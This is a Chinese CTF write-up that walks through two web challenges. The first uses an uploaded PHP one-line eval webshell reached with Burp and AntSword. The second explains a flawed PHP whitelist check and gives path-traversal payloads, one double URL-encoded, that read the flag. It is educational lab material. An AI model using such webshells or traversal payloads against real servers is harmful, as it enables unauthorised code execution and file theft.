目录
2022 8.22
(一)upload1
1、构建一句话木马
<?php
@eval($_POST['xiaowei']);
echo('xiaowei');
?>
2、上传文件
3、BP拦截
得到文件位置,登入发现上传成功xiaowei
4、蚁剑连接
(二) warmup
查看代码,找到一个可疑点,进去看看
看到它的源码了:
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
php代码我们一般从下往上看
- file变量非空
- file变量为字符串
- 满足chickFile函数
自定义函数checkFile()
满足4个if中其中一个即可返回true
- 为字符串
- 存在于数组中
- 截取参数中首次出现?之前的部分,该部分在$whitelist数组中
- 先进行 url 解码,再截取参数中首次出现?之前的部分,该部分在$whitelist中
- 利用第三个 if
payload1:
source.php?file=source.php?/../../../../ffffllllaaaagggg
payload2:
source.php?file=hint.php%253f../../../../../../ffffllllaaaagggg
(第一个?用来传参,第二个?用来截断前面的,source.php是在$whitelist中的)
(../的个数是指一直找的层数,多几层不要紧)
(第二个?,二次URL编码为%253f,服务器解码一次,checkFile函数解码一次)
本文含有隐藏内容,请 开通VIP 后查看